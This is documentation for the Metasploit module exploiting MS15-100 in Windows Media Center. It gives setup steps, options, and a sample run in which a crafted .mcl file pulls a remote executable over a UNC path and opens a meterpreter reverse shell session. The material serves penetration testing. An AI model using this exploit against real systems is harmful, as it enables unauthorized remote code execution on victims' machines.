## Vulnerable Application

This module exploits a vulnerability in Windows Media Center. By supplying an UNC path in the .mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution.

## Verification Steps

1. Start msfconsole
2. Do: `use exploit/windows/fileformat/ms15_100_mcl_exe`
3. Do: `set FILENAME [filename.mcl]`
4. Do: `set FILE_NAME [filename.exe]`
5. Do: `set payload [windows/meterpreter/reverse_tcp]`
6. Do: `set SRVHOST [IP]`
7. Do: `set SRVPORT [number]`
8. Do: `exploit`

## Options

### FILENAME
The MCL file.

### FILE_NAME
The name of the malicious payload to execute.

### FOLDER_NAME
Share Name (Default: Random).

### SRVHOST
The local host to listen on. This must be an address on the local machine or 0.0.0.0.

### SRVPORT
The local port to listen on.

## Scenarios

### A run on Windows Vista (Build 6000) and Kali Linux 2019.3

  ```
  msf > use exploit/windows/fileformat/ms15_100_mcl_exe
  msf exploit(windows/fileformat/ms15_100_mcl_exe) >  set FILENAME file.mcl
    FILENAME => file.mcl
  msf exploit(windows/fileformat/ms15_100_mcl_exe) > set FILE_NAME file.exe
    FILE_NAME => file.exe
  msf exploit(windows/fileformat/ms15_100_mcl_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
  msf exploit(windows/fileformat/ms15_100_mcl_exe) > set LHOST 192.168.1.3
    LHOST => 192.168.1.3
  msf exploit(windows/fileformat/ms15_100_mcl_exe) > exploit
    [*] Server started.
    [*] Malicious executable at \\192.168.1.3\Egoj\file.exe...
    [*] Creating 'file.mcl' file ...
    [+] file.mcl stored at /root/.msf4/local/file.mcl
    [*] Sending stage (180291 bytes) to 192.168.1.2
    [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.2:49248) at 2019-11-27 10:11:45 -0700
  ```
